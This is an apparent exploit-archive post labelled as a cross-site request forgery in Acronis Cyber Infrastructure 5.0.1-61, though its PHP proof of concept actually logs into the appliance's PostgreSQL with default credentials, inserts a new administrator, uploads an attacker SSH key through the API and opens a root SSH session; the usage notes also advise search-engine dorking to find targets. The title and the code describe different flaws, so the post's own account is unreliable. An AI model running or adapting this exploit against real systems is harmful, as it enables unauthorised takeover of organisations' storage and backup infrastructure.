Headline
Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery
Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] add new admin.[+] Line 83 + 100 +138 + 202 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass AcronisExploit { private $sshSocket; private $dbConn; private $clusterId; public function __construct() { // Initialize default values $this->sshSocket = null; $this->dbConn = null; $this->clusterId = null; } // Function to add an admin user to PostgreSQL DB public function addAdminUser($username, $userid, $password) { echo "Creating admin user $username with userid $userid\n"; // Insert new admin user into the user table $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');"); if (!$resQuery) return false; // Insert new admin user into the local_user table $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";"); if (!$resQuery) return false; $idLuser = pg_fetch_result($resQuery, 0, 0) + 1; $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);"); if (!$resQuery) return false; // Hash the password $passwordHash = password_hash($password, PASSWORD_BCRYPT); echo "Setting password $password with hash $passwordHash\n"; $today = date('Y-m-d'); $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');"); if (!$resQuery) return false; // Assign admin roles $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';"); $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';"); echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n"; $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');"); echo "Successfully created admin user $username with password $password\n"; return true; } // Function to run a PostgreSQL query private function postgresQuery($query) { $result = pg_query($this->dbConn, $query); if (!$result) { echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n"; return false; } return $result; } // Function to login to SSH public function doSshLogin($ip, $user, $sshKey) { $connection = ssh2_connect($ip, 22); if (!$connection) { echo "SSH connection failed\n"; return false; } if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) { $this->sshSocket = $connection; return true; } else { echo "SSH authentication failed\n"; return false; } } // Function to login to Acronis Cyber Infrastructure web portal public function aciLogin($name, $pwd) { $postData = json_encode([ 'username' => $name, 'password' => $pwd ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'X-Requested-With: XMLHttpRequest' ]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return (strpos($response, '"code":200') !== false); } // Function to get the cluster ID public function getClusterId() { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (isset($data['data'][0]['id'])) { return $data['data'][0]['id']; } return null; } // Function to generate SSH keys private function generateSshKeys() { $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private'); $publicKey = $privateKey . '.pub'; ssh2_genkeypair($privateKey, $publicKey); return [ 'private' => $privateKey, 'public' => $publicKey ]; } // Function to upload SSH public key public function uploadSshKey($sshKey, $clusterId) { $postData = json_encode([ 'key' => $sshKey, 'event' => [ 'name' => 'SshKeys', 'method' => 'post', 'data' => [ 'key' => $sshKey ] ] ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'X-Requested-With: XMLHttpRequest' ]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return (strpos($response, '"task_id"') !== false); } // Main exploit function public function exploit($rhost, $dbPort, $sshPort, $username, $password) { // Connect to PostgreSQL $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin"); if (!$this->dbConn) { echo "Could not connect to PostgreSQL database\n"; return false; } // Add a new admin user $newUsername = substr(md5(rand()), 0, 8); $newPassword = substr(md5(rand()), 0, 16); $userId = bin2hex(random_bytes(16)); $this->addAdminUser($newUsername, $userId, $newPassword); // Login to Acronis if (!$this->aciLogin($newUsername, $newPassword)) { echo "Failed to login to Acronis\n"; return false; } // Get cluster ID $this->clusterId = $this->getClusterId(); if (!$this->clusterId) { echo "Failed to get cluster ID\n"; return false; } // Generate SSH keys $sshKey = $this->generateSshKeys(); // Upload SSH public key if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) { echo "Failed to upload SSH public key\n"; return false; } // SSH Login if (!$this->doSshLogin($rhost, 'root', $sshKey)) { echo "SSH login failed\n"; return false; } echo "Exploit successful, SSH session established!\n"; return true; }}// Example usage$exploit = new AcronisExploit();$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================